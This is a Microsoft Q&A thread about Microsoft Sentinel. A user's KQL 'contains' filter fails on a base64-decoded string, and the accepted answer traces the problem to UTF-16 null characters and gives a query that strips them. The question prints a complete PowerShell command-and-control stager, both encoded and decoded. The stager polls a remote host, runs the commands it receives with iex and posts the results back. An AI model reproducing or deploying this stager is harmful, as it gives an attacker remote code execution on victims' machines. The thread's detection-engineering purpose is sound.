Share via

Microsoft Sentinel where clause failing for more than one character

Liam Jones 146 Reputation points
2022-10-12T16:36:22.197+00:00

I'm having difficulty searching a field for a value in KQL.

The field I am searching I get by decoding a base64 encoded string using the built in function base64_decode_tostring(). The string I am decoding is:

JABzAD0AJwAxADcAMgAuADIAMAAuADEAMAAuADIAOgA4ADAAOAAwACcAOwAkAGkAPQAnADYAOAAwADcAOQBhADAAYgAtADMANgA5ADAAMwAyADEAZAAtADEANgA2ADgAZABjADYAMQAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA2ADgAMAA3ADkAYQAwAGIAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AOQAyAGQAOQAtAGEAYgA2ADEAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwA2ADkAMAAzADIAMQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwACQAcwAvADEANgA2ADgAZABjADYAMQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=

This String decodes to what I expect in the decodedString Column:

$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers @{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers @{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers @{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}

It can be seen here in the results table:
Decoded String in Results

When I try and use a | where decodedString contains "X-92d9-ab61" clause to detect the string value in the decodedString, Sentinel says there are no results. However I can clearly see this string in my decodedString column above.

Where clause with no results

In fact, the where clause won't detect anything, unless it is a single character included in the decodedString column.

Why will it only detect single characters? Why will it not detect more than a one character string?

Azure Data Explorer
Azure Data Explorer
An Azure data analytics service for real-time analysis on large volumes of data streaming from sources including applications, websites, and internet of things devices.
561 questions
Microsoft Sentinel
Microsoft Sentinel
A scalable, cloud-native solution for security information event management and security orchestration automated response. Previously known as Azure Sentinel.
1,268 questions
0 comments
Accepted answer
  1. Alistair Ross 7,466 Reputation points Microsoft Employee
    2022-10-13T11:35:36.097+00:00

    Hi @Liam Jones

    I believe there must be an issue with the string at the point it is encoded or before. When running the query below, I can see that the encoded strings are different 

    let EncodedString = "JABzAD0..."; // Removed for Brevity  
let UnencodedString = "$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers @{\"X-92d9-ab61\"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers @{\"X-92d9-ab61\"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers @{\"X-92d9-ab61\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}";  
print Unencoded = base64_encode_tostring(UnencodedString)  
| extend Encoded = EncodedString

    When running this query, I can see that there is a null unicode character between each visable character in the outputted string 

    let EncodedString = "JABzAD0..."; // Removed for Brevity  
let DecodedString = tostring(base64_decode_tostring(EncodedString));  
print r = range(0,strlen(DecodedString),1)  
| mv-expand r to typeof(long)  
| extend c = substring(DecodedString,r,1)  
| extend d = to_utf8(c)

    250025-encoded.png

    I cannot explain the null characters, but we can strip them out then run your where statement on it 

    let EncodedString = "JABzAD0..."; // Removed for Brevity  
print  DecodedString = tostring(base64_decode_tostring(EncodedString))  
| extend DecodedString = replace_string(DecodedString, make_string(0),"")  
| extend l = strlen(DecodedString)  
| where DecodedString contains "X-92d9-ab61"

    Hope this all helps

    Alistair

    1 person found this answer helpful.
    0 comments

0 additional answers

Sort by: Most helpful
Most helpful Newest Oldest

Your answer

Answers can be marked as Accepted Answers by the question author, which helps users to know the answer solved the author's problem.